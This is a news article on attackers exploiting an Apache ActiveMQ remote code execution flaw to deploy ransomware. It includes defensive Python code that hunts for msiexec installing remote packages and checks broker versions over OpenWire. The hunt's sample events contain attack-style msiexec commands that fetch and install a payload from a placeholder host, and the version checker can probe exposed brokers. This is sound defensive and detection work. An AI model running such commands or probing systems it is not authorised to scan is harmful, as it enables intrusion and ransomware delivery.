Threat actors are exploiting a recently disclosed flaw in Apache ActiveMQ in an attempt to deploy ransomware against targeted organizations.
Researchers with Rapid7 on Wednesday said that they have observed suspected exploitation of the remote code execution flaw (tracked as CVE-2023-46604) in two different customer environments. Apache disclosed the flaw and released patches for it on Oct. 25, and proof-of-concept exploit code is publicly available for the bug.
“Based on the ransom note and available evidence, we attribute the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October,” according to Rapid7’s Managed Detection and Response team in an analysis. “Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.”
ActiveMQ is Apache’s open source message broker for enterprises, which lets different applications exchange messages with each other. According to Apache, the flaw could “allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” Apache’s wording matters: network access to the broker is the only stated prerequisite, so any broker whose OpenWire listener (ActiveMQ’s native binary protocol, served on TCP port 61616 by default) is reachable by an attacker is exposed.
According to the Shadowserver Foundation, as of Oct. 30 around 7,249 Apache ActiveMQ instances were exposed to the internet, and around 3,329 of those were found to be running versions vulnerable to the flaw.
In the attacks observed by Rapid7, the threat actors attempted to load remote binaries (named M2.png and M4.png) using MSIExec after the initial exploitation. The .png extension is cosmetic: msiexec installs whatever package the URL serves, so an msiexec command line that points at a remote URL with a non-.msi name is a strong hunting signal. The ransomware deployment attempts were “somewhat clumsy,” the researchers noted; the attackers tried several times to encrypt assets without success.
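The msiexec behaviour described above can be turned into a simple hunt over endpoint process-creation telemetry. The following is an added example, not Rapid7’s detection content or anything from the ActiveMQ project; the event records, field names, host names and 192.0.2.0/24 addresses are all constructed for the example. It flags msiexec launches that fetch a package over HTTP(S), raises severity when the package name does not end in .msi, and raises it again when the parent is a Java process, which is what the broker itself would look like after exploitation.

```python
import ntpath
import re
from typing import Dict, List, Optional

# Constructed process-creation events (not real telemetry). The first two mimic
# the observed pattern: msiexec pulling "M2.png"/"M4.png" from a remote host.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "mq-broker-01", "parent": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /q /i http://192.0.2.10/M2.png"},
    {"host": "mq-broker-02", "parent": r"C:\Program Files\Java\jre\bin\java.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /q /i http://192.0.2.10/M4.png"},
    # Benign: a user installing a local package.
    {"host": "ws-0417", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\jdoe\Downloads\7z2301-x64.msi"},
    # Lower-confidence: remote package, but a real .msi from a non-Java parent.
    {"host": "ws-0418", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://intranet.example.com/software/agent.msi"},
]

_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
_JAVA_PARENTS = {"java.exe", "javaw.exe"}


def triage_msiexec_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for msiexec launches that pull a package over HTTP(S), else None."""
    # ntpath handles both '\' and '/' separators regardless of the host OS.
    if ntpath.basename(event["image"]).lower() != "msiexec.exe":
        return None
    m = _URL_RE.search(event["cmdline"])
    if not m:
        return None  # local package path: an ordinary software install
    url = m.group(0)
    reasons = ["msiexec installing a package fetched over HTTP(S)"]

    path = url.split("?", 1)[0]
    if not path.lower().endswith(".msi"):
        # msiexec ignores the extension, so a .png (or any non-.msi) name on a
        # package URL is a disguise rather than an image.
        reasons.append("package URL does not end in .msi (%s)" % ntpath.basename(path))
    if ntpath.basename(event["parent"]).lower() in _JAVA_PARENTS:
        # Assumption for this example: the broker runs as java.exe, so a Java
        # parent means the broker process itself launched the installer.
        reasons.append("spawned by a Java process (the broker launched the installer)")

    severity = "high" if len(reasons) >= 3 else ("medium" if len(reasons) == 2 else "low")
    return {"host": event["host"], "url": url, "severity": severity, "reasons": reasons}


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the triage over a batch of events and keep only the findings."""
    return [f for f in (triage_msiexec_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["host"], finding["url"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The rule is deliberately narrow: it does not try to catch every post-exploitation child of the broker process, only the specific msiexec-from-URL pattern the report describes, which is cheap to run over command-line telemetry and produces very few benign hits outside managed software deployment.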
The activity nonetheless shows threat-actor interest in this flaw, and researchers recommend that security administrators apply the fixes as soon as possible. Several versions of Apache ActiveMQ are affected; users should upgrade to 5.15.16, 5.16.7, 5.17.6, or 5.18.3, the fixed release on each branch, to close the flaw.
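Because the exposure is the OpenWire listener described above and the fix is the per-branch floor just listed, an inventory check can combine the two: read the version the broker announces on connect and compare it against the fixed releases. The following is an added example, not Apache’s or Rapid7’s code. It relies on the fact that an ActiveMQ broker sends a WireFormatInfo frame as soon as a client connects, and that the frame carries a ProviderVersion string property; the `build_wireformatinfo` helper constructs a sample frame that mimics that layout (frame length, type byte, “ActiveMQ” magic, OpenWire version, then a property map whose string values are tagged 0x09 and written as length-prefixed UTF strings) so the check can run offline. It is a constructed sample, not a captured packet, and the handling of versions outside the 5.15–5.18 branches is an assumption noted in the code.

```python
import re
import socket
import struct
from typing import Optional, Tuple

# Fixed releases named in the advisory: anything below the floor on the same
# 5.x branch is affected. Branches older than 5.15 received no fixed release.
FIXED_FLOORS = {15: (5, 15, 16), 16: (5, 16, 7), 17: (5, 17, 6), 18: (5, 18, 3)}

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull an x.y.z triple out of strings such as '5.15.15' or '5.16.7-SNAPSHOT'."""
    m = _VERSION_RE.search(text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def is_vulnerable(version: str) -> Optional[bool]:
    """True if the version predates the fix on its branch, None if unparseable."""
    v = parse_version(version)
    if v is None:
        return None
    major, minor, _ = v
    if major != 5:
        # Assumption: only the 5.x branches the advisory lists are checked here;
        # older majors are treated as affected, newer ones as outside this check.
        return major < 5
    if minor < 15:
        return True   # older than the oldest branch that received a fix
    if minor > 18:
        return False  # newer than the listed branches (assumption, see above)
    return v < FIXED_FLOORS[minor]


def _utf(s: str) -> bytes:
    """Java/OpenWire 'UTF' string: 2-byte big-endian length, then the bytes."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def build_wireformatinfo(provider_version: str) -> bytes:
    """Constructed WireFormatInfo frame for offline testing (not a captured packet)."""
    props = {"ProviderName": "ActiveMQ", "ProviderVersion": provider_version, "PlatformDetails": "Java"}
    # Property map: entry count, then key (UTF) + STRING tag 0x09 + value (UTF).
    encoded = struct.pack(">i", len(props)) + b"".join(_utf(k) + b"\x09" + _utf(v) for k, v in props.items())
    # Type byte 0x01 (WIREFORMAT_INFO), magic, OpenWire version, non-null flag, map length, map.
    body = b"\x01" + b"ActiveMQ" + struct.pack(">i", 12) + b"\x01" + struct.pack(">i", len(encoded)) + encoded
    return struct.pack(">i", len(body)) + body


def extract_provider_version(frame: bytes) -> Optional[str]:
    """Read the ProviderVersion string property without fully unmarshalling the map."""
    key = b"ProviderVersion"
    idx = frame.find(key)
    if idx < 0:
        return None
    pos = idx + len(key)
    if pos + 3 > len(frame) or frame[pos] != 0x09:  # expect the STRING type tag
        return None
    (n,) = struct.unpack_from(">H", frame, pos + 1)
    value = frame[pos + 3:pos + 3 + n]
    if len(value) != n:  # truncated frame
        return None
    return value.decode("utf-8", errors="replace")


def fetch_wireformatinfo(host: str, port: int = 61616, timeout: float = 5.0) -> bytes:
    """Connect to an OpenWire listener and read the greeting the broker sends unprompted."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        header = s.recv(4)
        if len(header) < 4:
            raise ConnectionError("no OpenWire greeting received")
        (length,) = struct.unpack(">i", header)
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
        return header + data


def triage(frame: bytes) -> str:
    """One-line verdict for a WireFormatInfo frame."""
    version = extract_provider_version(frame)
    if version is None:
        return "unknown: no ProviderVersion in greeting"
    state = is_vulnerable(version)
    if state is None:
        return "unknown: unparseable version %r" % version
    return "%s: %s" % (version, "VULNERABLE, upgrade" if state else "fixed")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python check_activemq.py <host>  (hypothetical script name)
        print(triage(fetch_wireformatinfo(sys.argv[1])))
    else:
        for v in ("5.15.15", "5.15.16", "5.18.2", "5.18.3"):
            print(triage(build_wireformatinfo(v)))
```

The version banner is the cheapest triage signal, not proof of exploitability or of its absence: a broker behind a reverse proxy or with the OpenWire transport disabled will not answer, and a patched banner says nothing about whether the host was compromised before the upgrade, which is why Rapid7 pairs patching with an indicator search.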
“Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments,” according to Rapid7 researchers.